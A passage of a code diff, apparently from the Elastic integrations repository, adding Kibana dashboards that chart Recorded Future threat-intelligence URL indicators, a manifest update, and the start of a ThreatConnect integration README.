"indexpattern-datasource-layer-c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7": { + "columnOrder": [ + "b7f07f7c-1477-4f83-95f5-ad5cdc3a314b", + "0726d151-9edf-41cb-ab52-473ab27cf8b7" + ], + "columns": { + "0726d151-9edf-41cb-ab52-473ab27cf8b7": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "b7f07f7c-1477-4f83-95f5-ad5cdc3a314b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "curveType": "CURVE_MONOTONE_X", + "fittingFunction": "Zero", + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "0726d151-9edf-41cb-ab52-473ab27cf8b7" + ], + "layerId": "c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "b7f07f7c-1477-4f83-95f5-ad5cdc3a314b" + } + ], + "legend": { + "isInside": false, + "isVisible": true, + "legendSize": "auto", + "position": "bottom", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "Date", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Total Indicators" + } + }, + "title": "Indicators ingested per Datastream [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "00b93348-7c74-4fcd-be77-eadec8257f8f", + "w": 41, + "x": 7, + "y": 19 + }, + "panelIndex": "00b93348-7c74-4fcd-be77-eadec8257f8f", + "title": "Indicators ingested timeline [Logs RecordedFuture]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs RecordedFuture] Overview", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-29T11:53:41.335Z", + "id": "ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f476a486-e306-4906-bf28-30f0c9bd97d8:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "db90358b-9056-45eb-85a3-545631928ee6:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "db90358b-9056-45eb-85a3-545631928ee6:indexpattern-datasource-layer-1e757dc0-2e6d-4bd2-aa38-7da9133ca960", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ed8b8c1e-b34e-44c8-a760-da7fa133cb70:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "53b0c881-386f-4191-ba43-233d69090f78:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2ed483bb-680b-42c6-bc08-b1a7dd0ed410:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2ed483bb-680b-42c6-bc08-b1a7dd0ed410:dc42045c-acfa-4401-98f6-4845bf373eda", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4839d945-eaa1-4460-b3ff-af2ba457f7ea:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "00b93348-7c74-4fcd-be77-eadec8257f8f:indexpattern-datasource-layer-c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_4068d8b6-4d83-43a5-8c28-fcb4dabf8de8:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_190ee7fa-a38c-44fb-9112-596894954087:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_65b4761b-de0b-499d-83d4-46ea1eb3d3ac:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-ti_recordedfuture-security-solution-default", + "type": "tag" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3.json b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3.json new file mode 100644 index 00000000000..0949271fc91 --- /dev/null +++ b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3.json @@ -0,0 +1,870 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"07207a42-fb5d-4d37-b679-30845c08928d\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"07207a42-fb5d-4d37-b679-30845c08928d\",\"fieldName\":\"threat.indicator.provider\",\"title\":\"Provider\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"9dd2a48b-ebb5-44bf-8d45-087c1082723b\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"9dd2a48b-ebb5-44bf-8d45-087c1082723b\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator Type\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"6651cf6e-c85a-41ea-bfe2-b8bbd4fee9c9\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"6651cf6e-c85a-41ea-bfe2-b8bbd4fee9c9\",\"fieldName\":\"recordedfuture.list\",\"title\":\"Risk List\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "Dashboard providing statistics about URL type indicators from the RecordedFuture integration", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": [ + "ti_recordedfuture.threat" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.dataset": "ti_recordedfuture.threat" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "url" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "url" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n[RecordedFuture Overview](/app/dashboards#/view/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b) \n[RecordedFuture Files](/app/dashboards#/view/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b) \n**[RecordedFuture URLs (This Page)](/app/dashboards#/view/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3)** \n\n[Integrations Page](/app/integrations/detail/ti_recordedfuture/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: url**. \n\nThe dashboard is made to provide general statistics and show the health of your indicators like popular domains, file extensions, statistics about how many unique indicators are ingested and other relevant information.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 39, + "i": "c5b7a2b8-96dc-4c87-9022-334ca5536f1b", + "w": 7, + "x": 0, + "y": 0 + }, + "panelIndex": "c5b7a2b8-96dc-4c87-9022-334ca5536f1b", + "title": "Files Navigation Textbox [Logs AbuseCH]", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-88a112e1-6da1-49d3-9177-19f98280c200", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "88a112e1-6da1-49d3-9177-19f98280c200": { + "columnOrder": [ + "604f1693-15a6-437d-af69-03588db8e471" + ], + "columns": { + "604f1693-15a6-437d-af69-03588db8e471": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Ports", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.url.port" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "604f1693-15a6-437d-af69-03588db8e471", + "layerId": "88a112e1-6da1-49d3-9177-19f98280c200", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "8fac2020-b4cf-4267-b361-7ef813948d1a", + "w": 6, + "x": 7, + "y": 0 + }, + "panelIndex": "8fac2020-b4cf-4267-b361-7ef813948d1a", + "title": "Unique Ports [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a6fa56f8-32fa-405d-8771-dade4fe75d62", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "a6fa56f8-32fa-405d-8771-dade4fe75d62": { + "columnOrder": [ + "848c463b-bbc1-4b6a-af3e-76d844eb3cc5" + ], + "columns": { + "848c463b-bbc1-4b6a-af3e-76d844eb3cc5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Extensions", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.url.extension" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "848c463b-bbc1-4b6a-af3e-76d844eb3cc5", + "layerId": "a6fa56f8-32fa-405d-8771-dade4fe75d62", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "b14ba9f4-6432-494d-a325-d1bf37e93425", + "w": 6, + "x": 13, + "y": 0 + }, + "panelIndex": "b14ba9f4-6432-494d-a325-d1bf37e93425", + "title": "Unique File Extensions [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c94400ee-a135-4a99-9693-5879d29f7aad", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c94400ee-a135-4a99-9693-5879d29f7aad": { + "columnOrder": [ + "2934249f-fce5-4637-87ff-d2596d1b6ec5" + ], + "columns": { + "2934249f-fce5-4637-87ff-d2596d1b6ec5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Domains", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.url.domain" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "2934249f-fce5-4637-87ff-d2596d1b6ec5", + "layerId": "c94400ee-a135-4a99-9693-5879d29f7aad", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "d3f03987-e3a6-44bc-a784-c92f99bc20a9", + "w": 6, + "x": 19, + "y": 0 + }, + "panelIndex": "d3f03987-e3a6-44bc-a784-c92f99bc20a9", + "title": "Unique Domains [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "9fa49c4c-5544-472d-afce-e51d6a5687fe": { + "columnOrder": [ + "15e2b5ad-2040-4253-89a6-60f085c66f86", + "b9a631fe-5f49-4db2-a076-bcbf5410aec9" + ], + "columns": { + "15e2b5ad-2040-4253-89a6-60f085c66f86": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.url.extension", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "b9a631fe-5f49-4db2-a076-bcbf5410aec9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.extension" + }, + "b9a631fe-5f49-4db2-a076-bcbf5410aec9": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "9fa49c4c-5544-472d-afce-e51d6a5687fe", + "layerType": "data", + "legendDisplay": "default", + "legendSize": "auto", + "metrics": [ + "b9a631fe-5f49-4db2-a076-bcbf5410aec9" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "15e2b5ad-2040-4253-89a6-60f085c66f86", + "15e2b5ad-2040-4253-89a6-60f085c66f86" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 23, + "i": "d82d97ed-5e31-49b0-9bcb-04485bb31606", + "w": 23, + "x": 25, + "y": 0 + }, + "panelIndex": "d82d97ed-5e31-49b0-9bcb-04485bb31606", + "title": "Most Popular File Extensions [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-0f63318a-a857-4d83-89ce-a94e2242b79e", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "0f63318a-a857-4d83-89ce-a94e2242b79e": { + "columnOrder": [ + "df0791a6-247c-4434-a43a-fdea7577ca34", + "77a48096-02aa-4b7a-8a7b-131fc38988bd" + ], + "columns": { + "77a48096-02aa-4b7a-8a7b-131fc38988bd": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "df0791a6-247c-4434-a43a-fdea7577ca34": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.url.scheme", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "77a48096-02aa-4b7a-8a7b-131fc38988bd", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.scheme" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "0f63318a-a857-4d83-89ce-a94e2242b79e", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "77a48096-02aa-4b7a-8a7b-131fc38988bd" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "df0791a6-247c-4434-a43a-fdea7577ca34" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c14accd4-c14c-456b-bb88-815a24eb84d1", + "w": 18, + "x": 7, + "y": 8 + }, + "panelIndex": "c14accd4-c14c-456b-bb88-815a24eb84d1", + "title": "Percentage of URL Schema used [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-db89074c-e1fe-4091-bdb1-e42a36e82bac", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "db89074c-e1fe-4091-bdb1-e42a36e82bac": { + "columnOrder": [ + "b284ea2a-a2cd-4d08-bf44-fc73c08b5694", + "7ca1ac0b-2060-4431-a4b9-ec470af4448c" + ], + "columns": { + "7ca1ac0b-2060-4431-a4b9-ec470af4448c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "b284ea2a-a2cd-4d08-bf44-fc73c08b5694": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Domains", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "7ca1ac0b-2060-4431-a4b9-ec470af4448c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.domain" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "7ca1ac0b-2060-4431-a4b9-ec470af4448c", + "isTransposed": false + }, + { + "columnId": "b284ea2a-a2cd-4d08-bf44-fc73c08b5694", + "isTransposed": false + } + ], + "layerId": "db89074c-e1fe-4091-bdb1-e42a36e82bac", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "9ae5cf7f-7781-4826-bd47-8658192993b0", + "w": 18, + "x": 7, + "y": 23 + }, + "panelIndex": "9ae5cf7f-7781-4826-bd47-8658192993b0", + "title": "Most Popular Domains [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "9fa49c4c-5544-472d-afce-e51d6a5687fe": { + "columnOrder": [ + "15e2b5ad-2040-4253-89a6-60f085c66f86", + "b9a631fe-5f49-4db2-a076-bcbf5410aec9" + ], + "columns": { + "15e2b5ad-2040-4253-89a6-60f085c66f86": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.url.extension", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "b9a631fe-5f49-4db2-a076-bcbf5410aec9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.extension" + }, + "b9a631fe-5f49-4db2-a076-bcbf5410aec9": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "9fa49c4c-5544-472d-afce-e51d6a5687fe", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "b9a631fe-5f49-4db2-a076-bcbf5410aec9" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "15e2b5ad-2040-4253-89a6-60f085c66f86" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "c7f8fe13-3e6b-49f6-afeb-420b84a1ff2f", + "w": 23, + "x": 25, + "y": 23 + }, + "panelIndex": "c7f8fe13-3e6b-49f6-afeb-420b84a1ff2f", + "title": "Most Popular File Extensions % [Logs RecordedFuture]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs RecordedFuture] URLs", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-29T11:52:55.463Z", + "id": "ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8fac2020-b4cf-4267-b361-7ef813948d1a:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8fac2020-b4cf-4267-b361-7ef813948d1a:indexpattern-datasource-layer-88a112e1-6da1-49d3-9177-19f98280c200", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b14ba9f4-6432-494d-a325-d1bf37e93425:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b14ba9f4-6432-494d-a325-d1bf37e93425:indexpattern-datasource-layer-a6fa56f8-32fa-405d-8771-dade4fe75d62", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d3f03987-e3a6-44bc-a784-c92f99bc20a9:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d3f03987-e3a6-44bc-a784-c92f99bc20a9:indexpattern-datasource-layer-c94400ee-a135-4a99-9693-5879d29f7aad", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d82d97ed-5e31-49b0-9bcb-04485bb31606:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d82d97ed-5e31-49b0-9bcb-04485bb31606:indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c14accd4-c14c-456b-bb88-815a24eb84d1:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c14accd4-c14c-456b-bb88-815a24eb84d1:indexpattern-datasource-layer-0f63318a-a857-4d83-89ce-a94e2242b79e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9ae5cf7f-7781-4826-bd47-8658192993b0:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9ae5cf7f-7781-4826-bd47-8658192993b0:indexpattern-datasource-layer-db89074c-e1fe-4091-bdb1-e42a36e82bac", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c7f8fe13-3e6b-49f6-afeb-420b84a1ff2f:indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_07207a42-fb5d-4d37-b679-30845c08928d:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_9dd2a48b-ebb5-44bf-8d45-087c1082723b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6651cf6e-c85a-41ea-bfe2-b8bbd4fee9c9:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-ti_recordedfuture-security-solution-default", + "type": "tag" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/kibana/tag/ti_recordedfuture-security-solution-default.json b/packages/ti_recordedfuture/kibana/tag/ti_recordedfuture-security-solution-default.json new file mode 100644 index 00000000000..243dab7b015 --- /dev/null +++ b/packages/ti_recordedfuture/kibana/tag/ti_recordedfuture-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#FEC514", + "description": "Tag defined in package-spec", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-29T11:07:43.062Z", + "id": "ti_recordedfuture-security-solution-default", + "managed": false, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/manifest.yml b/packages/ti_recordedfuture/manifest.yml index 0ade47c0b91..ebc5e64dca3 100644 --- a/packages/ti_recordedfuture/manifest.yml +++ b/packages/ti_recordedfuture/manifest.yml @@ -1,13 +1,26 @@ name: ti_recordedfuture title: Recorded Future -version: "1.20.2" +version: "1.23.0" description: Ingest threat intelligence indicators from Recorded Future risk lists with Elastic Agent. type: integration -format_version: 3.0.0 +format_version: 3.0.2 categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 +screenshots: + - src: /img/rf-overview.png + title: "Dashboard: RecordedFuture Overview" + size: 1280x1329 + type: image/png + - src: /img/rf-files.png + title: "Dashboard: RecordedFuture Files" + size: 1280x1329 + type: image/png + - src: /img/rf-urls.png + title: "Dashboard: RecordedFuture URLs" + size: 1280x1329 + type: image/png icons: - src: /img/logo.svg title: Recorded Future diff --git a/packages/ti_threatconnect/_dev/build/build.yml b/packages/ti_threatconnect/_dev/build/build.yml new file mode 100644 index 00000000000..71f48ba2a9c --- /dev/null +++ b/packages/ti_threatconnect/_dev/build/build.yml @@ -0,0 +1,4 @@ +dependencies: + ecs: + reference: "git@v8.11.0" + import_mappings: true diff --git a/packages/ti_threatconnect/_dev/build/docs/README.md b/packages/ti_threatconnect/_dev/build/docs/README.md new file mode 100644 index 00000000000..6e963366896 --- /dev/null +++ b/packages/ti_threatconnect/_dev/build/docs/README.md @@ -0,0 +1,82 @@ +# ThreatConnect + +ThreatConnect is a widely used Threat Intelligence Platform (TIP) designed to assist organizations in aggregating, analyzing, and sharing information related to cybersecurity threats. The platform provides tools and features that enable security teams to collaborate on threat intelligence, manage incidents, and make informed decisions to enhance their overall cybersecurity posture. This ThreatConnect integration enables you to consume and analyze ThreatConnect data within Elastic Security, including indicator events, providing you with visibility and context for your cloud environments within Elastic Security. + +## Data streams + +The ThreatConnect integration collects a single type of data: Indicator. + +**Indicator** is used to retrieve atomic piece of information that has some intelligence value via the [ThreatConnect](https://docs.threatconnect.com/en/latest/rest_api/v3/indicators/indicators.html) + +Reference for [REST APIs](https://docs.threatconnect.com/en/latest/rest_api/rest_api.html#getting-started) of ThreatConnect. + +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install 